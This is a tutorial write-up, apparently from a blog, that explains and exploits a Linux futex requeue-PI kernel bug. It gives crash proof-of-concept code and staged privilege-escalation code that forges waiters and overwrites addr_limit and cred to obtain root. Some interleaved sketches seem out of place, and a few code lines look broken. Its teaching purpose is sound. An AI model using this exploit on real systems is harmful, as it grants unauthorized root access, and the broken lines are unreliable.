	/* Ensure we requeue to the expected futex. */
	if (!match_futex(top_waiter->requeue_pi_key, key2))
		return -EINVAL;

	/*
	 * Try to take the lock for top_waiter.  Set the FUTEX_WAITERS bit in
	 * the contended case or if set_waiters is 1.  The pi_state is returned
	 * in ps in contended cases.
	 */
	ret = futex_lock_pi_atomic(pifutex, hb2, key2, ps, top_waiter->task,
				   set_waiters);
	if (ret == 1)
		requeue_pi_wake_futex(top_waiter, key2, hb2);

	return ret;
}

Pay attention to how it ensures that the requeue_pi_key of the top_waiter is equal to the requeue’s target futex’s key. This is why we need to self-requeue, and why it wouldn’t be sufficient to just set the value of a different futex in userspace to 0 and requeue to it.

So the requirements for triggering the bug are:

  1. The target futex from the futex_wait_requeue_pi() remains.
  2. There’s a waiter that is actively contending on the source futex.

The only scenario that meets both these terms is a self-requeue.

Other than that, basically all it does is call futex_lock_pi_atomic() and if the lock was acquired,
wake up the top waiter of the source futex.

static int futex_lock_pi_atomic(u32 __user *uaddr, struct futex_hash_bucket *hb,
				union futex_key *key,
				struct futex_pi_state **ps,
				struct task_struct *task, int set_waiters)
{
	int lock_taken, ret, force_take = 0;
	u32 uval, newval, curval, vpid = task_pid_vnr(task);

	ret = lock_taken = 0;

	/*
	 * To avoid races, we attempt to take the lock here again
	 * (by doing a 0 -> TID atomic cmpxchg), while holding all
	 * the locks. It will most likely not succeed.
	 */
	newval = vpid;
	if (set_waiters)
		newval |= FUTEX_WAITERS;

	if (unlikely(cmpxchg_futex_value_locked(&curval, uaddr, 0, newval)))
		return -EFAULT;

	/* ... */

	/*
	 * Surprise - we got the lock. Just return to userspace:
	 */
	if (unlikely(!curval))
		return 1;

	/* ... */
}

The function attempts to atomically compare-and-exchange the futex-word. It compares it to 0, which is the value that signals the lock is free, and exchanges it with the task’s thread ID (TID), optionally OR-ed with the FUTEX_WAITERS bit.

This operation is unlikely to succeed because the user could have done it in userspace and avoided the expensive syscall. The assumption is therefore that the user wasn’t able to take the lock in userspace and needed the kernel’s “help”. That’s why it would be a “surprise” if it was able to get the lock.
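The compare-and-exchange itself can be played with outside the kernel. The sketch below models only that one step in JavaScript with Atomics.compareExchange on a shared 32-bit word. The function name tryLockAtomic and the TIDs 1234 and 5678 are made up for the example, and the real futex_lock_pi_atomic() does considerably more than this.

```javascript
const FUTEX_WAITERS = 0x80000000;

// One 32-bit futex word in shared memory; 0 means "unlocked".
const futexWord = new Uint32Array(new SharedArrayBuffer(4));

// Model of the 0 -> TID compare-and-exchange.
// Returns 1 if the lock was taken, 0 if the word was not 0.
function tryLockAtomic(word, tid, setWaiters) {
  // ">>> 0" keeps the value unsigned after the bitwise OR.
  const newval = (setWaiters ? tid | FUTEX_WAITERS : tid) >>> 0;
  // Writes newval only if the current value is 0; returns the value it saw.
  const curval = Atomics.compareExchange(word, 0, 0, newval);
  return curval === 0 ? 1 : 0;
}

// Step 1: the lock is held, so the futex word contains the owner's TID.
Atomics.store(futexWord, 0, 1234);
const whileLocked = tryLockAtomic(futexWord, 5678, true);
console.log(whileLocked); // 0

// Step 4: userspace overwrites the futex word with 0.
Atomics.store(futexWord, 0, 0);
const afterOverwrite = tryLockAtomic(futexWord, 5678, true);
console.log(afterOverwrite);            // 1
console.log(futexWord[0].toString(16)); // 8000162e
```

The second call is the “surprise” path: the kernel sees 0, writes the new owner into the word, and reports the lock as acquired.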

Recalling the function above, if we successfully took control of the lock, we’d wake the top waiter, which is the waiter that was added to the waiters list on the first requeue (step 3).
Because we overwrote the value in userspace (step 4), the function succeeds and wakes the waiter.
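To make the 0 -> TID exchange concrete, here is a minimal userspace sketch of the same idea using C11 atomics. It is not the kernel's code: try_lock_word() is a hypothetical name chosen for illustration, and only the FUTEX_WAITERS bit value comes from the real futex ABI.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdint.h>

#define FUTEX_WAITERS 0x80000000u /* same bit the kernel ORs into the futex word */

/*
 * Hypothetical userspace model of the "0 -> TID" attempt.
 * Returns 1 if the word was 0 and is now owned by tid, 0 otherwise.
 */
int try_lock_word(_Atomic uint32_t *word, uint32_t tid, int set_waiters)
{
    uint32_t expected = 0; /* 0 means "lock is free" */
    uint32_t newval = tid;

    if (set_waiters)
        newval |= FUTEX_WAITERS;

    /* Succeeds only when *word still equals 0 at the moment of the exchange. */
    return atomic_compare_exchange_strong(word, &expected, newval) ? 1 : 0;
}
```

In this model, writing 0 to the word from userspace (step 4) is exactly what turns the next attempt into a "surprise" success, even though the lock is logically still held.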

	ret = futex_lock_pi_atomic(pifutex, hb2, key2, ps, top_waiter->task,
				   set_waiters);
	if (ret == 1)
		requeue_pi_wake_futex(top_waiter, key2, hb2);

When futex_requeue() wakes up the waiter, it sets the rt_waiter to NULL in order to signal futex_wait_requeue_pi() that the atomic lock acquisition was successful.

static inline
void requeue_pi_wake_futex(struct futex_q *q, union futex_key *key,
			   struct futex_hash_bucket *hb)
{
	q->key = *key;

	/* ... */

	q->rt_waiter = NULL; // Right here.

	q->lock_ptr = &hb->lock;

	// Start scheduling the task again.
	wake_up_state(q->task, TASK_NORMAL);
}

Its usage is seen here within futex_wait_requeue_pi().

	/* Check if the requeue code acquired the second futex for us. */
	if (!q.rt_waiter) {
		/*
		 * Got the lock. We might not be the anticipated owner if we
		 * did a lock-steal - fix up the PI-state in that case.
		 */
		/* ... */
	} else {
		/*
		 * We have been woken up by futex_unlock_pi(), a timeout, or a
		 * signal.  futex_unlock_pi() will not destroy the lock_ptr nor
		 * the pi_state.
		 */
		// Removes the waiter from the wait_list.
		ret = rt_mutex_finish_proxy_lock(pi_mutex, to, &rt_waiter, 1);
		/* Unqueue and drop the lock. */
		/* ... */
	}

And as we can see, rt_mutex_finish_proxy_lock() is not being called since rt_waiter is NULL, and therefore the waiter is kept as-is within the waiters list.


We start off by locking a PI-futex. Then we simply requeue a thread to it, which creates a waiter entry on the futex’s waiters list. Afterwards, we overwrite the futex word with 0. Once we requeue the waiting thread onto itself, the attempt to atomically own the lock and wake the top waiter on the source (which is also the destination) futex succeeds.

Recap Image

This leaves us with a dangling waiter on the waiters list whose thread has continued and is up and running. Now, the waiter entry points to garbage kernel stack memory. The original rt_waiter is long gone and was destroyed by other function calls on the stack.

Bugged Waiter Image

Our waiter, a node in the waiters list, is now completely corrupted.

Building The Kernel

I won’t go into much depth on how I built the kernel, since there are a million tutorials out there on how to do that. I’ll merely state that I used a 3.11.4-i386 kernel for this exploit, compiled in a Xenial (Ubuntu 16.04) Docker container.

The only actual hassle was getting my hands on the right gcc version for the kernel version I worked on. I compared the GCC releases with the Linux kernel version history and tried various versions that seemed to fit by release date. Ultimately gcc-5 was what did the job for me.

It would be virtually impossible to do all of that without building your own kernel.
The ability to debug the code and add your own logs to it is invaluable.

For actually running the kernel, I’ve used QEMU as my emulator.


Now’s the time for the actual fun.

Eventually, our goal would be to escalate to root privileges.
The way we’d do that is by achieving arbitrary read & write within the kernel’s memory, and then overwrite our process’ cred struct which dictates the security context of a task.

struct cred {
	atomic_t	usage;
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
	/* ... */
};

The most fundamental members of cred are presumably the real uid and gid, but it also stores other properties such as the task’s capabilities and many others.

But how would we go about it with nothing more than a dangling reference to that waiter?
Quite frankly, the idea is fairly simple. There’s nothing new about corrupting a node within a linked list in order to gain read and write capabilities. Same applies here. We’d need to find a way to write to that dangling waiter, and then perform certain operations on it so that the kernel would do as we please.

Kernel Crash

But let’s start small. For now we’ll just attempt to crash the kernel.

I wrote a program that implements the steps that we listed above.
Let’s analyze it before going into the actual exploitation. Here’s the code.

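#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
/* Also needs the futex wrappers (flock, fwait_requeue, frequeue) described below. */

#define CRASH_SEC 3

int main()
{
    pid_t pid;
    uint32_t *futexes;
    uint32_t *non_pi_futex, *pi_futex;

    /* Two futex words in memory shared between the parent and the child. */
    futexes = mmap(NULL, sizeof(uint32_t) * 2, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
    assert(futexes != MAP_FAILED);

    non_pi_futex = &futexes[0];
    pi_futex = &futexes[1];

    flock(pi_futex);

    assert((pid = fork()) != -1);
    if (!pid)
    {
        fwait_requeue(non_pi_futex, pi_futex, 0);
        puts("Child continues.");
        exit(EXIT_SUCCESS);
    }

    printf("Kernel will crash in %u seconds...\n", CRASH_SEC);
    sleep(CRASH_SEC);

    frequeue(non_pi_futex, pi_futex, 1, 0);
    *pi_futex = 0;
    frequeue(pi_futex, pi_futex, 1, 0);

    return 0;
}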

The flock, fwait_requeue, and frequeue functions are implemented in a small futex wrappers file that I’ve created for simplification and ease on the eyes.

futexes = mmap(NULL, sizeof(uint32_t) * 2, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0)

We start off by allocating sizeof(uint32_t) * 2 bytes of R/W memory, which holds our two futexes.
Mind the MAP_SHARED flag passed to the mmap call: it signals that the memory needs to be shared between the main process and the process spawned by the fork() call.

Side-comment: In the actual exploit you’d see that I’m using pthreads rather than fork() which makes the code much clearer, and there’s no need to map a shared address space since all threads point to the same virtual address space.
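For readers who want to picture the futex wrappers mentioned above, here is a rough sketch of what such helpers could look like on top of the raw futex syscall. The names pi_lock, pi_wait_requeue and pi_requeue are hypothetical stand-ins for flock, fwait_requeue and frequeue, and the meaning assigned to the trailing arguments (maximum number of requeued waiters, expected futex value) is an assumption inferred from the calls in the crash program, not taken from the author's file.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <linux/futex.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Stand-in for flock(): acquire a PI futex (the kernel writes our TID into the word). */
long pi_lock(uint32_t *uaddr)
{
    return syscall(SYS_futex, uaddr, FUTEX_LOCK_PI, 0, NULL, NULL, 0);
}

/* Stand-in for fwait_requeue(): sleep on src until requeued onto the PI futex dst. */
long pi_wait_requeue(uint32_t *src, uint32_t *dst, uint32_t expected)
{
    return syscall(SYS_futex, src, FUTEX_WAIT_REQUEUE_PI,
                   (unsigned long)expected, NULL, dst, 0);
}

/*
 * Stand-in for frequeue(): requeue waiters from src onto the PI futex dst.
 * FUTEX_CMP_REQUEUE_PI requires nr_wake to be 1; the requeue limit travels
 * in the slot normally used for the timeout pointer.
 */
long pi_requeue(uint32_t *src, uint32_t *dst, uint32_t max_requeued, uint32_t expected)
{
    return syscall(SYS_futex, src, FUTEX_CMP_REQUEUE_PI, 1UL,
                   (unsigned long)max_requeued, dst, (unsigned long)expected);
}
```

Under these assumptions, frequeue(non_pi_futex, pi_futex, 1, 0) would read as "requeue at most one waiter, provided the source word still holds 0".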

  1. Lock the pi_futex.
     flock(pi_futex);
  2. Spawn a child process and call FUTEX_WAIT_REQUEUE_PI from non_pi_futex to pi_futex.
     assert((pid = fork()) != -1);
     if (!pid) { fwait_requeue(non_pi_futex, pi_futex, 0); puts("Child continues."); exit(EXIT_SUCCESS); }
  3. Sleep, only to make sure that the child’s fwait_requeue has already been issued. Afterwards, requeue the waiter to the pi_futex.
     sleep(CRASH_SEC);
     frequeue(non_pi_futex, pi_futex, 1, 0);
  4. Overwrite the userspace value of the pi_futex with 0.
     *pi_futex = 0;
  5. Self-requeue.
     frequeue(pi_futex, pi_futex, 1, 0);

Now let’s see this in action.

If you paid attention to the call trace, you would spot that the kernel crashes once the process itself terminates (do_exit). The kernel attempts to clean up the process’ resources (mm_release), specifically the PI state list (exit_pi_state_list), and while doing so it unlocks all the futexes that the process holds. During the process of releasing them, the kernel tries to unlock our corrupted waiter as well, which causes a crash.

To be more accurate, it occurs here.

static inline struct rt_mutex_waiter *
rt_mutex_top_waiter(struct rt_mutex *lock)
{
	struct rt_mutex_waiter *w;

	w = plist_first_entry(&lock->wait_list, struct rt_mutex_waiter,
			       list_entry);
	BUG_ON(w->lock != lock); // <-- KERNEL BUG

	return w;
}

The function compares the lock that the top waiter claims it waits on to the actual lock. Because the waiter is completely bugged, its lock member no longer points to the corresponding rt_mutex, which triggers the BUG_ON and crashes the kernel.

Privilege Escalation

DoSing the system is pretty cool, but let’s make it more interesting by escalating to root privileges.

I intentionally do not post the entire exploit in advance because that would most likely be too overwhelming. Instead, I’ll append code blocks by stages.
If you do prefer to have the entire exploit available in hand, it can be found here.

Writing To The Waiter

In order to make use of our dangling waiter, we’d first need to find a way to write to it.
A quick reminder, our waiter is placed on the kernel stack. With that in mind, we need to somehow be able to write a controlled buffer to the place the waiter was held within the stack. Given that we’re just a userspace program, our way of writing data to the kernel’s stack is by issuing System Calls.

But how do we know which syscall to invoke?
Luckily for us, the kernel comes with a useful tool called checkstack.
It can be found within the source under scripts/

$ objdump -d vmlinux | ./scripts/ i386 | grep -E "(futex_wait_requeue_pi|sys)"

0xc11206e6 do_sys_poll [vmlinux]:                       932
0xc1120aa3 do_sys_poll [vmlinux]:                       932
0xc1527388 ___sys_sendmsg [vmlinux]:                    248
0xc15274d8 ___sys_sendmsg [vmlinux]:                    248
0xc1527b1a ___sys_recvmsg [vmlinux]:                    220
0xc1527c6b ___sys_recvmsg [vmlinux]:                    220
0xc1087936 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc1087a80 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc1529828 __sys_sendmmsg [vmlinux]:                    184
0xc15298fe __sys_sendmmsg [vmlinux]:                    184

The script lists the stack usage (the size of the stack frame) of each function within the kernel. This helps us estimate which syscall we should use in order to write to the waiter’s address space.

We impose two requirements on the system call we’re looking for.

  1. It is deep enough in order to overlap with our dangling rt_waiter.
  2. The local variable within the function that overlaps rt_waiter is controllable.

The syscalls sendmsg, recvmsg, and sendmmsg are the adjacent functions to futex_wait_requeue_pi in terms of stack usage.
That should be a good place to start. We’ll be using sendmmsg throughout the exploit.

Breakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,
    abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285

(gdb) set $waiter = &rt_waiter

Breakpoint 2, ___sys_sendmsg (sock=sock@entry=0xc5dfea80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cbef4,
    flags=flags@entry=0x0, used_address=used_address@entry=0xc78cbf10) at net/socket.c:1979

(gdb) p $waiter
$12 = (struct rt_mutex_waiter *) 0xc78cbe2c

(gdb) p &iovstack
$11 = (struct iovec (*)[8]) 0xc78cbe08

(gdb) p sizeof(iovstack)
$13 = 0x40

(gdb) p &iovstack < $waiter < (char*)&iovstack + sizeof(iovstack)
$14 = 0x1 (True)

I set two breakpoints, at futex_wait_requeue_pi() and ___sys_sendmsg(), in order to understand which arguments we should pass to the sendmmsg syscall so that rt_waiter is under our control.

When the breakpoint hits on futex_wait_requeue_pi(), I do nothing besides storing the address of rt_waiter in $waiter. When it hits on ___sys_sendmsg(), I check for the address of the local variable iovstack, which is of type struct iovec[8], and examine its size.

rt_waiter: 0xc78cbe2c
iovstack: 0xc78cbe08 to 0xc78cbe48

This proves that futex_wait_requeue_pi:rt_waiter overlaps with ___sys_sendmsg:iovstack.
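The overlap can also be checked with plain arithmetic on the addresses printed by gdb. The sketch below uses two hypothetical helpers, addr_in_range() and offset_in_range(), and works on 32-bit values because the target is i386. Note that a chained comparison such as a < b < c does not test a range in C, so the check is spelled out explicitly.

```c
#include <assert.h>
#include <stdint.h>

/* Returns 1 when addr lies inside [base, base + size), 0 otherwise. */
int addr_in_range(uint32_t base, uint32_t size, uint32_t addr)
{
    return addr >= base && addr - base < size;
}

/* Byte offset of addr from base; only meaningful when addr_in_range() holds. */
uint32_t offset_in_range(uint32_t base, uint32_t addr)
{
    return addr - base;
}
```

With the values from the session above (iovstack at 0xc78cbe08, size 0x40, rt_waiter at 0xc78cbe2c), the waiter starts 0x24 bytes into iovstack. Since a struct iovec is 8 bytes on i386, that is the second field (iov_len) of iovstack[4].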

Let’s take a look at sendmmsg’s signature.

int sendmmsg(int sockfd, struct mmsghdr *msgvec, unsigned int vlen,
                    int flags);

struct mmsghdr
{
	struct msghdr msg_hdr;
	unsigned int msg_len;
};

struct msghdr
{
	void *msg_name;
	socklen_t msg_namelen;
	struct iovec *msg_iov; // <-- iovstack
	size_t msg_iovlen;
	void *msg_control;
	size_t msg_controllen;
	int msg_flags;
};

struct iovec
{
	void *iov_base;
	size_t iov_len;
};

At this point I suggest understanding the syscall itself.

The sendmmsg() system call is an extension of sendmsg(2) that allows the caller to transmit multiple messages on a socket using a single system call. (This has performance benefits for some applications.)

The arguments are pretty trivial and essentially the same as sendmsg only that there’s mmsghdr that can contain multiple msghdr.
If you’re unfamiliar with the syscall, give it a read at man sendmmsg(2).

In order to invoke sendmmsg successfully, we’d need a pair of connected sockets that we can send the data to. It is very important to understand that we want ___sys_sendmsg() to block so that we can take advantage of the waiter’s corrupted state while it’s under our control.

Typically, the function sends the data over the socket and exits. In order to make it block, we’d need to use SOCK_STREAM as our socket type which provides a reliable connection-based byte stream. This grants us the blocking capabilities we’ve talked about. On top of that, we’d need to fill up the “send buffer” so that data can’t be sent over the socket, unless data is read on the other end.

I’ve crafted a function that does just that.


int client_sockfd, server_sockfd;

void setup_sockets()
{
    int fds[2];

    puts(USERLOG "Creating a pair of sockets for kernel stack modification using blocking I/O.");

    assert(!socketpair(AF_UNIX, SOCK_STREAM, 0, fds));

    client_sockfd = fds[0];
    server_sockfd = fds[1];

    /* Fill the send buffer until a non-blocking send would have to block. */
    while (send(client_sockfd, BLOCKBUF, BLOCKBUFLEN, MSG_DONTWAIT) != -1)
        ;
    assert(errno == EWOULDBLOCK);
}

The function creates a pair of UNIX sockets of type SOCK_STREAM and then sends AAAAAAAA over the socket until the call to send fails with EWOULDBLOCK as the errno. Note the MSG_DONTWAIT flag that makes the send return immediately instead of blocking.

Enables nonblocking operation; if the operation would block, EAGAIN or EWOULDBLOCK is returned.

Afterwards we assert that EWOULDBLOCK is in fact the reason the operation failed.

Next up, we’re ready for actually invoking our sendmmsg to overwrite rt_waiter. Exciting!

To overwrite the waiter’s list entries properly, which is what we’re interested in, we need to lay out the iovec array in userspace so that, once it is copied into iovstack in kernelspace, its fields line up with the waiter’s fields.

#define COUNT_OF(arr) (sizeof(arr) / sizeof(arr[0]))

struct mmsghdr msgvec;
struct iovec msg[7];

void setup_msgs()
{
    int i;

    /* Every iovec slot carries the same recognizable marker values. */
    for (i = 0; i < COUNT_OF(msg); i++)
    {
        msg[i].iov_base = (void *)0x41414141;
        msg[i].iov_len = 0xace;
    }

    msgvec.msg_hdr.msg_iov = msg;
    msgvec.msg_hdr.msg_iovlen = COUNT_OF(msg);
}

In this function I set up the messages (the iovec array) in the hope that they will overwrite the waiter’s struct once I call sendmmsg. Once again, I’ve placed two breakpoints at futex_wait_requeue_pi() and ___sys_sendmsg().

Breakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,
    abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285
(gdb) set $waiter = &rt_waiter
(gdb) cont

Breakpoint 3, ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,
    flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979

(gdb) fin
Run till exit from #0  ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,
    flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979
Program received signal SIGINT, Interrupt.
(gdb) p *$waiter
$26 = {
  list_entry = {
    prio = 0xace,
    prio_list = {
      next = 0x41414141,
      prev = 0xace
    },
    node_list = {
      next = 0x41414141,
      prev = 0xace
    }
  },
  ...

There are many interesting things to look at from this experiment. Let’s go over it.

Just as before, I store rt_waiter’s address. When the breakpoint at ___sys_sendmsg() hits, I continue the execution until the function is about to exit. However, because the function blocks, I have to interrupt the debugger with a ^C. By the time the function blocks, it has already filled the iovstack. After I do that, I inspect the waiter struct and see that the overwrite occurred just as I wanted it to.

Waiter Overwritten Image

(In reality there’s only a single waiter)

That’s great! We can now overwrite the dangling waiter’s memory.
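The gdb output can be reproduced offline with a small layout model. This is only a sketch under stated assumptions: the structs below are hypothetical fixed-width mirrors of the i386 layouts (4-byte pointers and size_t), the field order of the list node follows the gdb dump above, and the 0x24 offset is derived from the addresses in the earlier debugging session (0xc78cbe2c minus 0xc78cbe08).

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical 32-bit mirrors of the kernel structures on i386. */
struct iovec32 { uint32_t iov_base; uint32_t iov_len; };
struct list_head32 { uint32_t next; uint32_t prev; };
struct plist_node32 {
    int32_t prio;
    struct list_head32 prio_list;
    struct list_head32 node_list;
};

#define WAITER_OFFSET 0x24 /* rt_waiter address minus iovstack address */

/* Read the bytes of an 8-entry iovec array as the waiter's list_entry would see them. */
struct plist_node32 overlay_waiter(const struct iovec32 iov[8])
{
    struct plist_node32 node;

    memcpy(&node, (const unsigned char *)iov + WAITER_OFFSET, sizeof(node));
    return node;
}
```

Filling the first seven entries with iov_base = 0x41414141 and iov_len = 0xace yields prio = 0xace, next = 0x41414141 and prev = 0xace for both lists, matching the dump. In other words, under this layout iov_len of entry 4 lands on prio, and entries 5 and 6 cover prio_list and node_list.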

Let’s review this as a whole within the exploit code.

void *forge_waiter(void *arg)
{
    puts(USERLOG "Placing the fake waiter on the dangling node within the mutex's waiters list.");

    assert(!fwait_requeue(&non_pi_futex, &pi_futex, 0));
    assert(!sendmmsg(client_sockfd, &msgvec, 1, 0));
}

int main()
{
    pthread_t forger, ref_holder;

    /* ... */

    assert(!pthread_create(&forger, NULL, forge_waiter, NULL));

    assert(frequeue(&non_pi_futex, &pi_futex, 1, 0) == 1);

    assert(!pthread_create(&ref_holder, NULL, lock_pi_futex, NULL));

    pi_futex = 0;
    frequeue(&pi_futex, &pi_futex, 1, 0);

    /* ... */
}

We’ve already reviewed setup_msgs() and setup_sockets(). fwait_requeue() blocks until the self-requeue is triggered. As soon as it returns, sendmmsg() is called to overwrite the waiter, and it blocks as well.

You can see that I create another thread called ref_holder, which also attempts to lock pi_futex and in turn forms another waiter instance. This is needed because the state of the futex would get destroyed if there weren’t any contending waiters on the lock.

Kernel Infoleak

Our next goal would be to leak an address that would help us target the task_struct of our process which contains its cred so that we can overwrite it later to gain root privileges.

We do this with a fake waiter. When we attempt to lock the futex once again, another waiter is added to the waiters list, and the insertion writes to the adjacent nodes, which are under our control. Once that happens, we can read the kernel address from userspace through the fake waiter’s list nodes.

#define DEFAULT_PRIO 120
#define THREAD_INFO_BASE 0xffffe000

struct rt_mutex_waiter fake_waiter, leaker_waiter;
pthread_t corrupter;

void link_fake_leaker_waiters()
{
    fake_waiter.list_entry.node_list.prev = &leaker_waiter.list_entry.node_list;
    fake_waiter.list_entry.prio_list.prev = &leaker_waiter.list_entry.prio_list;
    fake_waiter.list_entry.prio = DEFAULT_PRIO + 1;
}

void leak_thread_info()
{
    assert(!pthread_create(&corrupter, NULL, lock_pi_futex, NULL));

    corrupter_thread_info = (struct thread_info *)((unsigned int) & THREAD_INFO_BASE);
    printf(USERLOG "Corrupter's thread_info @ %p\n", corrupter_thread_info);
}

Let’s first address what’s called a “Thread Info”.
thread_info is a thread descriptor that is held within the kernel and is placed on the stack’s address space. For each thread that we create using pthread_create() a new thread_info is generated in the kernel.

struct thread_info {
	struct task_struct	*task;		/* main task structure */
	struct exec_domain	*exec_domain;	/* execution domain */
	__u32			flags;		/* low level flags */
	__u32			status;		/* thread synchronous flags */
	__u32			cpu;		/* current CPU */
	int			preempt_count;	/* 0 => preemptable,
						   <0 => BUG */
	mm_segment_t		addr_limit;
	struct restart_block    restart_block;
	void __user		*sysenter_return;
	unsigned int		sig_on_uaccess_error:1;
	unsigned int		uaccess_err:1;	/* uaccess failed */
};

The reason it interests us is because it’s relatively easy to get its address once you have a leak, and the more interesting reason is that it contains a pointer to the process’ task_struct. Just to clarify, a new task_struct is also created for each thread.

In order to do the actual leak, we link together two fake waiters. One is named fake_waiter which is used for general list corruption, and the other is called leaker_waiter because its sole usage is to leak addresses through.

By linking I mean in practice that we set the previous node of the fake_waiter to be the leaker_waiter, and set its priority to be the default priority of a task plus one so that it’ll place itself after the leaker_waiter. Priority is a value that correlates to the process’ niceness.

Crafted Waiter Image

Those aren’t the actual priorities but the idea remains.

After we’ve linked the waiters in userspace, we call lock_pi_futex() on another thread so that a waiter is created which attempts to add itself into the list. Naturally, once a node is added into a list, it writes to its adjacent nodes, in our case to leaker_waiter.

New Waiter Image

Awesome! We’ve leaked a kernel stack address of one of the threads in our program.
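The leak relies on nothing more than ordinary doubly linked list insertion. The following sketch models it in userspace with a hypothetical three-node setup; list_add_tail() performs the same pointer updates as the kernel helper of that name, while the priority-ordering logic that decides where the new waiter goes is left out.

```c
#include <assert.h>
#include <stddef.h>

struct list_head { struct list_head *next, *prev; };

/* Insert node right before head, updating both neighbours. */
void list_add_tail(struct list_head *node, struct list_head *head)
{
    struct list_head *prev = head->prev;

    head->prev = node;
    node->next = head;
    node->prev = prev;
    prev->next = node; /* the neighbour now stores the new node's address */
}
```

If head stands for the fake waiter's list node and its prev points at the leaker node in userspace, inserting a freshly created kernel waiter before it stores that waiter's address in the leaker's next field, where userspace can simply read it.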

In order to target its thread_info, all we have to do is AND its address with THREAD_INFO_BASE. You can see that from current_thread_info()’s implementation, though that might vary across different architectures. Here’s the source for x86.

/* how to get the thread information struct from C */
static inline struct thread_info *current_thread_info(void)
{
	return (struct thread_info *)
		(current_stack_pointer & ~(THREAD_SIZE - 1));
}

We now know where the thread_info is located in memory.
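As a worked example of the masking step, the sketch below applies the same AND to a sample kernel stack address. It assumes an 8 KiB kernel stack (THREAD_SIZE of 8192), which is what makes the mask equal to the THREAD_INFO_BASE value 0xffffe000 used in the exploit; thread_info_of() is a hypothetical helper name, and the input is the rt_waiter address from the earlier gdb session, used here purely as sample data.

```c
#include <assert.h>
#include <stdint.h>

#define THREAD_SIZE 8192u /* assumed kernel stack size on this i386 build */

/* Round a kernel stack address down to the start of its stack, where thread_info lives. */
uint32_t thread_info_of(uint32_t stack_addr)
{
    return stack_addr & ~(THREAD_SIZE - 1);
}
```

For the sample address 0xc78cbe2c this gives 0xc78ca000: the low 13 bits are cleared and everything above them is kept.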

Overwriting Address Limit

Just as we can read by corrupting the list, we can utilize the same technique in order to use it for writing purposes. The first memory area that we’ll be targeting is what’s called the “Address Limit”.

It lives in thread_info.addr_limit, as you can see in thread_info above. It is used for limiting the virtual address space that is reserved for the user. When the kernel works with user-provided addresses, it compares them to the thread’s addr_limit in order to verify that they are valid userspace addresses. If the supplied address is smaller than addr_limit, the designated memory area is considered to be in userspace.

The addr_limit is an excellent target for initial kernel overwrite because once you overwrite it with 0xffffffff, you have gotten full arbitrary read and write capabilities to kernel memory.

void kmemcpy(void *src, void *dst, size_t len)
{
    int pipefd[2];

    /* Bounce the data through a pipe so that the kernel performs both copies. */
    assert(!pipe(pipefd));
    assert(write(pipefd[1], src, len) == len);
    assert(read(pipefd[0], dst, len) == len);
}

void escalate_priv_sighandler()
{
    struct task_struct *corrupter_task, *main_task;
    struct cred *main_cred;
    unsigned int root_id = 0;
    void *highest_addr = (void *)-1;
    unsigned int i;

    puts(USERLOG "Escalating main thread's privileges to root.");

    kmemcpy(&highest_addr, &corrupter_thread_info->addr_limit, sizeof(highest_addr));
    printf(USERLOG "Written 0x%x to addr_limit.\n", -1);

    kmemcpy(&corrupter_thread_info->task, &corrupter_task, sizeof(corrupter_thread_info->task));
    printf(USERLOG "Corrupter's task_struct @ %p\n", corrupter_task);

    kmemcpy(&corrupter_task->group_leader, &main_task, sizeof(corrupter_task->group_leader));
    printf(USERLOG "Main thread's task_struct @ %p\n", main_task);

    kmemcpy(&main_task->cred, &main_cred, sizeof(main_task->cred));
    printf(USERLOG "Main thread's cred @ %p\n", main_cred);

    for (i = 0; i < COUNT_OF(main_cred->ids); i++)
        kmemcpy(&root_id, &main_cred->ids[i], sizeof(root_id));

    puts(USERLOG "Escalated privileges to root successfully.");
}

void escalate_priv()
{
    pthread_t addr_limit_writer;

    struct sigaction sigact = {.sa_handler = escalate_priv_sighandler};
    assert(!sigaction(SIGINT, &sigact, NULL));
    puts(USERLOG "Registered the privileges escalator signal handler for interrupting the corrupter thread.");

    fake_waiter.list_entry.prio_list.prev = (struct list_head *)&corrupter_thread_info->addr_limit;
    assert(!pthread_create(&addr_limit_writer, NULL, lock_pi_futex, NULL));

    pthread_kill(corrupter, SIGINT);
}

After we’ve executed leak_thread_info(), we’re going to call escalate_priv(). The first thing that it does is register escalate_priv_sighandler as the SIGINT signal handler using the sigaction() syscall.

Let’s briefly mention what signal handlers are and why we use them. A signal handler is a function that is called by the target environment when the corresponding signal occurs. The target environment suspends execution of the program until the signal handler returns.

